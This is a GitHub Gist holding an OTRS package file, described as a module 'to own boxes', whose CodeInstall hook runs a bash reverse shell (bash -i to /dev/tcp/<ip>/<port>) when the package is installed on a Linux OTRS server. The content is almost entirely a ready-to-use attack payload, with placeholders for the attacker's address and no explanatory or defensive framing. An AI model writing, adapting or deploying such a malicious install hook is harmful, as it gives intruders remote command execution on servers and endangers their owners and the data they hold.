Created
January 3, 2017 03:14
-
-
Save natesubra/a6a4df43c44c43d8fb8f8c85ef033d1d to your computer and use it in GitHub Desktop.
OPM reverse shell for linux OTRS installs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="utf-8"?> | |
<otrs_package version="1.0"> | |
<Name>OTRS Command Runner</Name> | |
<Version>1.0</Version> | |
<Framework>5.0.x</Framework> | |
<Vendor>scrubs</Vendor> | |
<Description Lang="en">A module to own boxes with OTRS more quickly.</Description> | |
<License>MIT License</License> | |
<CodeInstall><![CDATA[ | |
system('bash -i >& /dev/tcp/<ip>/<port> 0>&1'); | |
]]></CodeInstall> | |
<BuildDate>2016-07-05 23:12:45</BuildDate> | |
<BuildHost>perl-services</BuildHost> | |
</otrs_package> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment